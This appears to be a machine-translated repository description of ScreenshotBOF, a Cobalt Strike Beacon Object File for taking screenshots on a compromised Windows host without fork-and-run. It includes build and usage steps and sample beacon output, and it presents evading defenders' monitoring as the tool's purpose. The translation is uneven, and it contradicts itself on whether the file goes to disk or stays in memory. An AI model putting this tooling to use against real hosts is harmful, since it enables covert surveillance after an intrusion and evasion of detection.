ScreenshotBOF - WinAPIを使用し、フォーク&ランを実行しないコバルトストライクの代替スクリーンショット機能。ファイルとしてディスクに保存されたスクリーンショット。

(An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.)

Created at: 2022-10-23 16:58:22
Language: C

スクリーンショットBOF

WinAPIを使用し、フォーク&ランを実行しないコバルトストライクの代替スクリーンショット機能。スクリーンショットがメモリにダウンロードされました。

自己コンパイル

  1. gitはレポをクローンします
  2. Visual Studio でソリューションを開く
  3. プロジェクト BOF のビルド

使い

  1. スクリーンショットBOF.cnaスクリプトをコバルトストライクにインポートする
  2. {ローカルファイル名} screenshot_bofコマンドを使用します
beacon> screenshot_bof sad.bmp
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 4860 bytes
[+] received output:
[*] Tasked beacon to printscreen and save to sad.bmp
[+] received output:
[+] PrintScreen saved to bitmap...
[*] started download of sad.bmp

筆記

  • 回避は実行されませんが、使用されるWinAPIは悪意のあるものではないため、問題ありません

なぜ私はこれを作ったのですか?

Cobalt Strikeは、スクリーンショットコマンドを含む、ポストエクス機能の多くにフォーク&ランと呼ばれるテクニックを使用しています。この動作は安定性を提供しますが、現在はよく知られており、厳重に監視されています。この BOF は、スクリーンショット機能のより安全なバージョンの OPSEC を提供することを目的としています。

クレジット